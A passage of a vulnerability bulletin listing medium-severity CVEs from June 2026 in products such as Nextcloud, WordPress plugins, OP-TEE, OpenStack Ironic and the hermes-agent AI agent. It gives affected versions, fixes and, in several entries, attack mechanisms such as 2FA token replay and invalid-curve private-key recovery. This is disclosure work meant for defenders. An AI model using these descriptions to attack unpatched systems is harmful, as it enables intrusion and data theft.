| mjperpinosa--stumasy | A vulnerability was found in mjperpinosa stumasy. The affected element is an unknown function of the file application/PHP/objects/updates/add_post.php. Performing a manipulation of the argument up_file_to_post results in unrestricted upload. The attack may be initiated remotely. The exploit has been made public and could be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-04 | 6.3 | CVE-2026-10806 |
| mjperpinosa--stumasy | A vulnerability was determined in mjperpinosa stumasy. The impacted element is an unknown function of the file application/PHP/objects/profiles/change_profile_image.php. Executing a manipulation of the argument pr_profile_image can lead to unrestricted upload. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-04 | 6.3 | CVE-2026-10807 |
| morgan--morgan | Impact: The morgan logging middleware's :remote-user token extracts the Basic auth username from the Authorization request header and writes it to the log stream without neutralizing control characters. An unauthenticated attacker can send a crafted Authorization Basic header containing CR or LF bytes to inject forged log lines, breaking the one-request-per-line structure of access logs and enabling log forgery against downstream log consumers. The built-in combined, common, default, and short formats are affected, as well as any custom format that references :remote-user. Affected versions: morgan 1.2.0 through 1.10.1. Patches: upgrade to morgan 1.11.0, which neutralizes control characters in the :remote-user token output. Workarounds: use a custom format string that does not include :remote-user. | 2026-06-03 | 5.3 | CVE-2026-5078 |
| mr_mat--Remove meta boxes per user role | The Remove meta boxes per user role plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.01. This is due to missing or incorrect nonce validation on the 'remove-meta-boxes-per-user-role' page. This makes it possible for unauthenticated attackers to modify or reset the plugin's per-role meta box visibility settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-8422 |
| myCred--myCred | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in myCred allows Stored XSS. This issue affects myCred: from n/a through 3.0.4. | 2026-06-01 | 6.5 | CVE-2026-42676 |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. In versions 2.2.4 and prior, the OAuth callback handling does not validate the state parameter server-side before exchanging the authorization code. This allows an attacker to capture a valid OAuth callback URL for their own account and cause a victim's browser to navigate to it, resulting in the victim's session being authenticated as the attacker-linked account (OAuth login CSRF / session swapping). This is patched in version 2.2.5. | 2026-06-02 | 5.4 | CVE-2026-34460 |
| NamelessMC--Nameless | NamelessMC is website software for Minecraft servers. A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in version 2.2.4 in the id parameter of the endpoint `/index.php?route=/queries/user/`. The application reflects user-supplied input from the id parameter into the HTML response without proper sanitization or output encoding. An attacker can craft a malicious URL containing JavaScript code. When a victim visits the crafted URL, the injected script executes in the victim's browser within the context of the vulnerable application. This could allow attackers to execute arbitrary JavaScript, potentially leading to session hijacking, phishing attacks, or manipulation of page content. Version 2.2.5 fixes the issue. | 2026-06-02 | 4.3 | CVE-2026-32250 |
| NAVTOR--NavBox | NAVTOR NavBox through version 4.16.1.20 contains hard-coded credentials within its Windows Communication Foundation (SOAP) implementation. If the SOAP functionality is enabled, a local attacker can extract credentials to bypass the intended transfer workflow. Successful authentication against the SOAP interface grants access to privileged WCF methods, enabling an attacker to write or overwrite files within application-defined paths. | 2026-06-04 | 6.3 | CVE-2026-21404 |
| nesquena--Hermes WebUI | Hermes WebUI prior to v0.51.221 contains a path traversal vulnerability that allows attackers to escape the workspace boundary by supplying symlinks that resolve to files or directories outside the designated workspace root. Attackers can exploit the workspace file and listing APIs, which resolve symlink targets without enforcing that the final path remains within the workspace, to read external host files accessible to the server process and disclose sensitive data such as SSH keys, cloud credentials, or application tokens. | 2026-06-04 | 6.5 | CVE-2026-11322 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, when a malicious user has access to a file share of a user, they could use this share token to also access the chunking upload directly and see temporary part files during on going uploads. It is recommended that the Nextcloud Server is upgraded to 32.0.9 or 33.0.3. It is recommended that the Nextcloud Enterprise Server is upgraded to 26.0.13.26, 27.1.11.25, 28.0.14.17, 29.0.16.16, 30.0.17.9, 31.0.14.5, 32.0.9 or 33.0.3 | 2026-06-01 | 6.3 | CVE-2026-45157 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. Prior to version 5.2.6, a missing permissions check allowed users to request reading form submissions of other users. This issue has been patched in version 5.2.6. | 2026-06-01 | 6.5 | CVE-2026-45267 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. Prior to version 2.7.2, a privilege escalation vulnerability exists in the Approval app that allows a user without sharing permissions to force the system to share a file with approvers. This results in an authorization bypass and privilege escalation, allowing unauthorized distribution of restricted files. This issue has been patched in version 2.7.2. | 2026-06-01 | 6.5 | CVE-2026-45275 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, an authenticated attacker can access attachments of link shares when knowing the share token, circumventing password protection or download restrictions. It is applicable to any file that is shared directly, as the attacker only needs to know a documentId they own, apart of the mentioned share token. For shared folders the attacker has to know or guess a documentId of a file that is included inside the folder, making it much harder to exploit. The attacker can only extract an attachments, but not the file shared file or folder itself. It is recommended that the Nextcloud Server is upgraded to 33.0.3 or 32.0.9. It is recommended that the Nextcloud Enterprise Server is upgraded to 33.0.3, 32.0.9, 31.0.14.5, 30.0.17.9, 29.0.16.16, 28.0.14.17 or 27.1.11.5 | 2026-06-01 | 6.5 | CVE-2026-45282 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.2, and 33.0.0 to before 33.0.1, the files_lock app did not properly validate the ownership of files when processing DAV lock and unlock requests. An authenticated user could lock or unlock files belonging to other users by targeting their absolute WebDAV paths. Additionally, lock tokens were disclosed to unauthorized callers in error responses, allowing attackers to remove token-based locks placed by other users' client applications. It is recommended that the Nextcloud Server is upgraded to 32.0.2 or 33.0.1. It is recommended that the Nextcloud Enterprise Server is upgraded to 31.0.14.4 or 32.0.2 or 33.0.1 | 2026-06-01 | 6.3 | CVE-2026-45283 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, when a user shares a folder or file with a Nextcloud Team that includes an external member (a person added via email address who does not have a Nextcloud account), the system automatically creates a public link for that external member. This public link is not displayed in the share section of the folder, so the folder owner has no knowledge of its existence. It is sent via email to the external member. It grants the same permissions (read, write, delete, reshare, download) as the Team's access. An attacker who receives or intercepts this link can access, modify, delete, reshare, and download all data in the shared folder without any further authentication. The folder owner cannot see or revoke the link through the normal sharing interface. This issue has been patched in versions 32.0.9 and 33.0.3. | 2026-06-01 | 6.4 | CVE-2026-45285 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 31.0.0 to before 31.0.12, and 32.0.0 to before 32.0.3, a missing check of a relation allowed authenticated users with access to any file comment, to read the content of all comments. It is recommended that the Nextcloud Server is upgraded to 31.0.12 or 32.0.3. It is recommended that the Nextcloud Enterprise Server is upgraded to 21.0.9.20, 22.2.10.35, 23.0.12.31, 24.0.12.30, 25.0.13.25, 26.0.13.22, 27.1.11.22, 28.0.14.13, 29.0.16.10, 30.0.17.5, 31.0.12 or 32.0.3 | 2026-06-01 | 6.8 | CVE-2026-45810 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 4.3.0 to before version 5.2.7, a removed collaborator retains unauthorized read access to uploaded respondent files for the affected form. The scope is limited to uploaded files for forms where that user previously had results access. This issue has been patched in version 5.2.7. | 2026-06-01 | 5.3 | CVE-2026-45543 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, an authentication bypass vulnerability allowed attackers with knowledge of a user's password to circumvent two-factor authentication (2FA) protections. When a user initiated login with valid credentials on a 2FA-enabled account, the system created a temporary session token before enforcing the second factor challenge. This token could be extracted and replayed via HTTP Basic Authentication to gain unauthorized access to authenticated endpoints. It is recommended that the Nextcloud Server is upgraded to 33.0.3 or 32.0.9. It is recommended that the Nextcloud Enterprise Server is upgraded to 33.0.3, 32.0.9, 31.0.14.5, 30.0.17.9 or 29.0.16.16 | 2026-06-01 | 5.9 | CVE-2026-45690 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, a pre-2FA session cookie (created after successful password authentication but before TOTP completion) could be reused as a Bearer token to authenticate against DAV endpoints, granting read/write access and bypassing mandatory two-factor authentication. It is recommended that the Nextcloud Server is upgraded to 33.0.3 or 32.0.9. It is recommended that the Nextcloud Enterprise Server is upgraded to 33.0.3, 32.0.9, 31.0.14.5, 30.0.17.9 or 29.0.16.16 | 2026-06-01 | 5.9 | CVE-2026-45691 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 33.0.0 to before version 33.1.0, after unlocking a locked Android phone the back-button could be used to bypass the Nextcloud Files app PIN. This issue has been patched in version 33.1.0. | 2026-06-01 | 4.6 | CVE-2026-45153 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 17.0.0 to before 17.0.15, 18.0.0 to before 18.1.12, 19.0.0 to before 19.1.16, 20.0.0 to before 20.1.11, and 21.0.0 to before 21.0.4, a user with READ and CREATE permission, but no UPDATE permission for a team folder can rename files in the team folder. This issue has been patched in versions 17.0.15, 18.1.12, 19.1.16, 20.1.11, and 21.0.4. | 2026-06-01 | 4.3 | CVE-2026-45264 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 31.0.0 to before 31.0.14, and 32.0.0 to before 32.0.4, if {lang} is used in the template directory config value, non-admin users can in some cases copy arbitrary files (depending on unix permissions) into their own Nextcloud directory via a path traversal. It is recommended that the Nextcloud Server is upgraded to 32.0.4, 31.0.14. It is recommended that the Nextcloud Enterprise Server is upgraded to 32.0.4, 31.0.14, 30.0.17.7, 29.0.17.12, 28.0.14.15 | 2026-06-01 | 4.4 | CVE-2026-45279 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 1.3.6 to before version 8.4.0, an improper check allowed users that where provided by LDAP to still authenticate towards user OIDC after they where deleted. This issue has been patched in version 8.4.0. | 2026-06-01 | 4.6 | CVE-2026-45284 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 5.5.13 to before 5.5.17, and 6.2.0 to before 6.2.3, an authenticated user can enumerate users on the same Nextcloud instance by using the Calendar app's endpoint for suggesting attendees. The sharing restrictions, applied to other endpoints, were not effective here. This issue has been patched in versions 5.5.17 and 6.2.3. | 2026-06-01 | 4.3 | CVE-2026-45286 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 0.8.0 to before version 1.0.4, the view filter criteria is exposed to users with read-only permissions in Nextcloud Tables. This issue has been patched in versions 1.0.4 and 2.0.0. | 2026-06-01 | 4.3 | CVE-2026-45544 |
| nextendweb--Smart Slider 3 | The Smart Slider 3 plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.5.1.36 via the replaceHTMLImage function. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-06-06 | 4.9 | CVE-2026-9197 |
| nextlevelbuilder--GoClaw | A flaw has been found in nextlevelbuilder GoClaw up to 3.11.3. The impacted element is the function handleSave of the file internal/http/tts_config.go of the component RoleAdmin Gateway. This manipulation causes improper privilege management. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project tagged the reported issue as bug. | 2026-06-01 | 6.3 | CVE-2026-10217 |
| nextlevelbuilder--GoClaw | A vulnerability has been found in nextlevelbuilder GoClaw up to 3.11.3. This affects the function auth of the file internal/http/evolution_handlers.go. Such manipulation leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The project tagged the reported issue as bug. | 2026-06-01 | 5.4 | CVE-2026-10218 |
| nextlevelbuilder--GoClaw | A security vulnerability has been detected in nextlevelbuilder GoClaw up to 3.11.3. Affected by this issue is the function Import of the file internal/http/tts_config.go of the component TTS Configuration Endpoint. The manipulation leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The project tagged the reported issue as bug. | 2026-06-02 | 4.7 | CVE-2026-10583 |
| nextlevelbuilder--GoClaw | A weakness has been identified in nextlevelbuilder GoClaw up to 3.11.3. The impacted element is the function TeamTasksTool.executeComplete of the file internal/tools/team_tasks_lifecycle.go of the component Team Task Completion Handler. Executing a manipulation can lead to missing authorization. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The project tagged the reported issue as bug. | 2026-06-02 | 4.3 | CVE-2026-10616 |
| NIC--BIRD | CZ.NIC BIRD Internet Routing Daemon through 2.19.0 contains a stack-based buffer overflow in the BGP AS_PATH mask matching implementation in nest/a-path.c. The as_path_match() function uses a fixed-size stack array of 2048 + 1 pm_pos entries, while parse_path() expands AS_PATH segments from a received BGP UPDATE without enforcing a corresponding capacity limit. When RFC 8654 BGP Extended Messages are enabled and a BIRD filter evaluates an AS path mask expression such as "bgp_path ~ [= ... =]", an established BGP peer can send a long AS_PATH containing more than 2048 expanded ASNs. This causes parse_path()/as_path_match() to write beyond the fixed stack buffer, resulting in a crash of the daemon. NOTE: reportedly, the Supplier's position is that a fix is not being prioritized because all network operators should already be rejecting routes with unusually long attributes. | 2026-06-02 | 6.3 | CVE-2026-49943 |
| NousResearch--hermes-agent | A weakness has been identified in NousResearch hermes-agent up to 2026.4.30. This affects the function _scan_memory_content of the file tools/memory_tool.py. This manipulation causes injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 6.3 | CVE-2026-10223 |
| NousResearch--hermes-agent | A vulnerability has been found in NousResearch hermes-agent up to 0.12.0. This affects the function resolve_session_by_title of the file hermes_state.py of the component resume Endpoint. Such manipulation of the argument Title leads to authorization bypass. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 6.3 | CVE-2026-11461 |
| NousResearch--hermes-agent | A security flaw has been discovered in NousResearch hermes-agent up to 2026.4.30. Affected by this issue is the function _sanitize_env_lines of the file hermes_cli/config.py. The manipulation results in injection. It is possible to launch the attack remotely. The attack requires a high level of complexity. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 5.6 | CVE-2026-10222 |
| NousResearch--hermes-agent | A security vulnerability has been detected in NousResearch hermes-agent up to 2026.4.30. This vulnerability affects the function _handle_webhook_request of the file gateway/platforms/feishu.py of the component Webhook Endpoint. Such manipulation leads to resource consumption. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 5.3 | CVE-2026-10224 |
| NousResearch--hermes-agent | A security flaw has been discovered in NousResearch hermes-agent up to 2026.4.23. This affects the function _sync_anthropic_entry_from_credentials_file of the file agent/credential_pool.py of the component Credential Pool Synchronization. The manipulation results in improper authentication. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-02 | 5.3 | CVE-2026-10548 |
| ntbyk--JTL-Connector for WooCommerce | The JTL-Connector for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.4.1. This is due to missing capability checks and nonce verification on the admin_post_settings_save_woo-jtl-connector action (handled by JtlConnectorAdmin::save()) and on the wp_ajax_downloadJTLLogs and wp_ajax_clearJTLLogs AJAX actions (handled by the global downloadJTLLogs() and clearJTLLogs() functions). This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary plugin settings, download a ZIP archive of the connector's developer log files, and delete those log files. | 2026-06-02 | 4.3 | CVE-2026-9234 |
| OP-TEE--optee_os | OP-TEE is a Trusted Execution Environment (TEE) designed as companion to a non-secure Linux kernel running on Arm; Cortex-A cores using the TrustZone technology. Prior to version 4.11.0, on many of the ECDH shared secret paths, the public key isn't verified to be a point on the correct curve. By passing approximately 30-40 crafted public keys to OP-TEE, the private key can be reconstructed by a normal world attacker. When calling TEE_DeriveKey the public key is provided with full X and Y values, but the (X, Y) point might not satisfy the `Y^2 == X^3 + aX + b mod P` math for the specific curve that is used. When those public keys aren't rejected, the attacker can select public keys such that each DeriveKey call will leak `d % r` where `d` is the private key and `r` comes from the relationship between the correct curve and the attacker selected curve. With enough leaked data the Chinese remainder theorem can be used to recover the full private key. Version 4.11.0 fixes the issue. | 2026-06-03 | 4.7 | CVE-2026-45614 |
| OP-TEE--optee_os | OP-TEE is a Trusted Execution Environment (TEE) designed as companion to a non-secure Linux kernel running on Arm; Cortex-A cores using the TrustZone technology. Starting in version 4.3.0 and prior to version 4.11.0, a type confusion vulnerability exists in OP-TEE OS when processing an FFA_MEM_SHARE request from the normal world. This only applies when OP-TEE is configured as an SPMC for S-EL0 SPs, that is, with `CFG_CORE_SEL1_SPMC=y` and `CFG_SECURE_PARTITION=y`. Version 4.11.0 fixes the issue. | 2026-06-03 | 4.4 | CVE-2026-45702 |
| open-telemetry--go.opentelemetry.io/otel/baggage | OpenTelemetry-Go is the Go implementation of OpenTelemetry. Versions 1.41.0 and 1.43.0 removed raw-length rejection and it causes `Parse` to process arbitrarily large/invalid baggage headers and log errors, enabling DoS via oversized inputs. Versions 1.42.0 and 1.44.0 fix the issue. | 2026-06-04 | 5.3 | CVE-2026-41178 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, OBI exports raw Redis error text as the span status message. Because Redis error replies can contain attacker-controlled or sensitive values, this behavior can exfiltrate tokens, PII, or other confidential input into telemetry backends and inject untrusted text into downstream analysis systems. This issue has been patched in version 0.9.0. | 2026-06-02 | 6.5 | CVE-2026-45679 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, OBI's replacement ELF parser trusts section offsets, counts, and string offsets from the executable file. A crafted local ELF can make OBI dereference invalid section pointers or slice past string tables, causing the agent to panic while determining the process language. This issue has been patched in version 0.9.0. | 2026-06-02 | 5.5 | CVE-2026-45676 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, OBI replays BPF probe hits into histogram observations by looping once per recorded run count. On busy systems, the run-count delta can become very large, causing the metrics exporter to spend excessive CPU time in a tight loop every collection interval. This issue has been patched in version 0.9.0. | 2026-06-02 | 5.9 | CVE-2026-45680 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, the per-CPU message-buffer fallback path uses a 256-byte backup buffer but preserves the original payload size, which can be up to 8KB. If a CPU mismatch occurs, OBI can read beyond the fallback buffer and leak adjacent memory into telemetry. This issue has been patched in version 0.9.0. | 2026-06-02 | 5.9 | CVE-2026-45681 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, the custom CappedConcurrentHashMap introduced for Java TLS state tracking never removes keys from its insertion-order queue when entries are deleted. In long-running instrumented JVMs, repeated connection churn can therefore grow the queue without bound and exhaust heap memory. This issue has been patched in version 0.9.0. | 2026-06-02 | 5.1 | CVE-2026-45682 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. From version 0.7.0 to before version 0.9.0, OBI's log enricher mishandles writev buffers by reading only the first iovec entry but using the total iov_iter.count as the copy length. When log injection is enabled, a crafted multi-segment writev call can make OBI read and overwrite memory beyond the first segment. This issue has been patched in version 0.9.0. | 2026-06-02 | 4.9 | CVE-2026-45684 |
| OpenSC--OpenSC | A flaw has been found in OpenSC up to 0.26.1. This affects the function test_kpgen_certwrite of the file src/tools/pkcs11-tool.c of the component pkcs11-tool Key Generation Module. This manipulation causes buffer overflow. The attack is possible to be carried out remotely. The complexity of an attack is rather high. It is indicated that the exploitability is difficult. The exploit has been published and may be used. Patch name: 814f745b3b6d100295f65f1935edd33d520d33ab. It is recommended to apply a patch to fix this issue. | 2026-06-01 | 5 | CVE-2026-10275 |
| OpenStack--Ironic | OpenStack Ironic before 35.0.2 allows Boot Script Injection of an iPXE script if the attacker can set node.driver_info or node.instance_info. | 2026-06-03 | 5.8 | CVE-2026-46447 |
| OpenStack--Ironic | OpenStack Ironic through before 35.0.2 allows file overwrite via directory traversal during deployment with a crafted ISO image. | 2026-06-04 | 5.9 | CVE-2026-48681 |
| OpenStack--Ironic | In OpenStack Ironic 32 before 37.0.0, an unauthenticated malicious user could submit a crafted JSON string to some endpoints on the API or JSON-RPC service and effect a service crash. | 2026-06-04 | 5.3 | CVE-2026-50589 |
| OpenStack--Ironic | OpenStack Ironic before 35.0.2 allows a malicious authenticated project admin or manager to read local files on the Ironic conductor via a pxe_template. | 2026-06-04 | 4.9 | CVE-2026-44917 |
| Orca Energy--Orca heat pump | Missing authentication and clear‑text transmission of data from the heat pumps to the control server, combined with the absence of input validation on aggregated data, can lead to stored XSS that enables theft of cookies from the pump's web control interface. Older Orca heat pump devices communicating with the Orca server over an unencrypted and unauthenticated HTTP connection on a non-secure port specifically enable an attacker to impersonate a legitimate device and inject malicious payloads. This enables the insertion of harmful code directly into the Orca user portal, potentially compromising user accounts, exposing sensitive information, and allowing further unauthorized actions within the portal. | 2026-06-01 | 6.3 | CVE-2026-25599 |
| OTRS AG--OTRS | An improper neutralization of active SVG content in OTRS or ((OTRS)) Community Edition ticket article rendering allows attackers to inject specially crafted SVG payloads via email content, leading to browser-side resource exhaustion and denial of service when affected tickets are opened by an agent or customer. The issue can be exploited without JavaScript execution and is not mitigated by the configured Content Security Policy (CSP). This issue affects OTRS: * 7.0.X * 8.0.X * 2023.X * 2024.X * 2025.X * 2026.X before 2026.4.X Please note that ((OTRS)) Community Edition 6.x and before are vulnerable. Products based on the ((OTRS)) Community Edition also very likely to be affected | 2026-06-01 | 6.5 | CVE-2026-48208 |
| OTRS AG--OTRS | An uncontrolled allocation of resources without limits or throttling in the e-mail handling in OTRS allows excessive allocation which may lead to the abortion of the webserver.This issue affects OTRS: * 8.0.X * 2023.X * 2024.X * 2025.X * 2026.X before 2026.4.X Please note that ((OTRS)) Community Edition 6.x, OTRS 7.x and products based on the ((OTRS)) Community Edition also very likely to be affected | 2026-06-01 | 5.7 | CVE-2026-48187 |
| OTRS AG--OTRS | An improper Input Validation vulnerability in OTRS Customer Backend module allows to access customer information which are restricted to other groups. Please note that the feature has to be anabled and CustomerGroupSupport has to be used to be affected. This issue affects OTRS: * 7.0.X * 8.0.X * 2023.X * 2024.X * 2025.X * 2026.X before 2026.4.X | 2026-06-01 | 5.7 | CVE-2026-48189 |
| PackageKit--PackageKit | A vulnerability has been found in PackageKit up to 1.3.5. Affected is the function g_file_test of the file src/pk-transaction.c of the component API. Such manipulation of the argument frontend-socket leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 4.3 | CVE-2026-10294 |
| Paolo--GeoDirectory | Missing Authorization vulnerability in Paolo GeoDirectory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GeoDirectory: from n/a through 2.8.157. | 2026-06-01 | 6.5 | CVE-2026-42671 |
| passeum--Passeum Ticketing | The Passeum Ticketing plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.0. This is due to the `get_shop_url()` method returning the `shop_name` setting value without sanitization when it begins with "http", combined with insufficient validation in the `validate_shop_name()` function which only checks for empty values and string type. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary external scripts by setting the `shop_name` to an attacker-controlled URL (e.g., `https://attacker.com`), which causes the plugin to enqueue external JavaScript and CSS from the attacker-controlled domain via `wp_register_script()` and `wp_register_style()`. The injected scripts execute on every frontend page containing any Passeum Ticketing shortcode, affecting all site visitors. Please note that this does not affect single-site installations as administrators already have the `unfiltered_html` capability. | 2026-06-02 | 4.4 | CVE-2026-7421 |
| pattihis--Simple Custom Login Page | The Simple Custom Login Page plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the color settings fields (Page Background, Form Background, Text Color, Link Color) in versions up to and including 1.0.3. This is due to insufficient input sanitization of the color option values (they were registered with register_setting() and stored via the Settings API/update_option() with no sanitize_callback) combined with the values being output into a <style> block on wp-login.php using esc_attr(), which is incorrect for a CSS context (it does not escape ;, {, }, / or *). This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary CSS rules into the login page that are rendered for all unauthenticated visitors, enabling UI-redress and credential-phishing attacks. | 2026-06-02 | 4.4 | CVE-2026-10100 |
| payaddons--Express Payment For Stripe | The Express Payment For Stripe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'type' attribute of the [stripe-express] shortcode in versions up to, and including, 1.28.0. This is due to insufficient input sanitization and output escaping on the shortcode attribute value, which is concatenated into an HTML attribute in the rendered output of the register_shortcode() function without being passed through esc_attr() or any other escaping function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-05 | 6.4 | CVE-2026-8893 |
| pcis--Laiser Tag | The Laiser Tag plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.5. This is due to missing or incorrect nonce validation on the addOptionsPageFields function. This makes it possible for unauthenticated attackers to update the plugin's settings, including the API key, tag blacklist, relevance threshold, batch size, and tagging toggles, via a forged request via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-9722 |
| planetshaker--EmergencyWP Dead Man's switch & legacy deliverance | The EmergencyWP - Dead Man's switch & legacy deliverance plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.2. This is due to missing or incorrect nonce validation on the form_settings_ui (settings save handler, procedural include scope) function. This makes it possible for unauthenticated attackers to modify plugin settings including the minimum access role (altering WordPress role capabilities via add_cap/remove_cap), the data-erasure-on-uninstall flag, life-check timing values, the mandator email address, the confirmation page ID, and date/time formats via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-9732 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that process PNG (Portable Network Graphics) raster image files. In version 1.8.0, three inter-frame chunk discard paths in the push-mode APNG parser clear the chunk-header flag without consuming the chunk body and CRC, allowing attacker-controlled bytes inside an ignored ancillary chunk to be reinterpreted as a fresh chunk header on the next call to `png_process_data`. Commit faf06924688b62d7c1654b5ceddedbde66ffadb4 fixes the issue. | 2026-06-04 | 5.4 | CVE-2026-40930 |
| Popup-Builder--Popup Builder | WordPress Popup Builder 3.49 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by breaking out of option tags in the post_title parameter. Attackers can submit crafted POST requests to the post.php endpoint with script payloads in the post_title field that execute when pages or posts display popup selections. | 2026-06-04 | 6.4 | CVE-2019-25744 |
| Printeers--Printeers Print & Ship | Missing Authorization vulnerability in Printeers Printeers Print & Ship allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Printeers Print & Ship: from n/a through 1.17.0. | 2026-06-02 | 6.5 | CVE-2025-52766 |
| projectworlds--Online Art Gallery Shop Project | A vulnerability was identified in projectworlds Online Art Gallery Shop Project 1.0. The affected element is an unknown function of the file /admin/adminHome.php. The manipulation of the argument social_insta leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-06-04 | 6.3 | CVE-2026-10874 |
| projectworlds--Online Art Gallery Shop Project | A security flaw has been discovered in projectworlds Online Art Gallery Shop Project 1.0. The impacted element is an unknown function of the file /admin/adminHome.ph. The manipulation of the argument social_twitter results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-04 | 6.3 | CVE-2026-10875 |
| QloApps--QloApps | QloApps through 1.7.0, fixed in commit 64e9722, contains a weak cryptographic algorithm vulnerability that allows attackers to compromise user credentials by exploiting the use of MD5 for password hashing in the Tools::encrypt() function within classes/Tools.php, which concatenates a static cookie key with the supplied password. Attackers can perform offline brute-force attacks against the MD5 hashes, with the risk compounded by auto-generated 8-character passwords assigned during guest-to-customer account conversion in classes/Customer.php, making credential recovery trivial. | 2026-06-02 | 5.9 | CVE-2026-25861 |
| qriouslad--Debug Log Manager Conveniently Monitor and Inspect Errors | The Debug Log Manager - Conveniently Monitor and Inspect Errors plugin for WordPress is vulnerable to Improper Output Neutralization for Logs in all versions up to, and including, 2.5.0. This is due to the `log_js_errors()` AJAX handler being registered for unauthenticated users via `wp_ajax_nopriv_log_js_errors` and gated only by a nonce that is publicly disclosed in every front-end page's HTML through `wp_localize_script()` whenever JavaScript error logging is enabled, providing no real authorization barrier. This makes it possible for unauthenticated attackers to inject arbitrary forged entries into the site's WordPress debug log by supplying attacker-controlled values for the `message`, `script`, `lineNo`, `columnNo`, and `pageUrl` fields - enabling spoofing of error and incident records, obscuring malicious activity within fabricated log noise, and misleading administrators who rely on the log for triage. This vulnerability is only exploitable when the plugin's JavaScript error logging feature is enabled, as the requisite nonce is only published into the page HTML under that condition. | 2026-06-06 | 5.3 | CVE-2026-9016 |
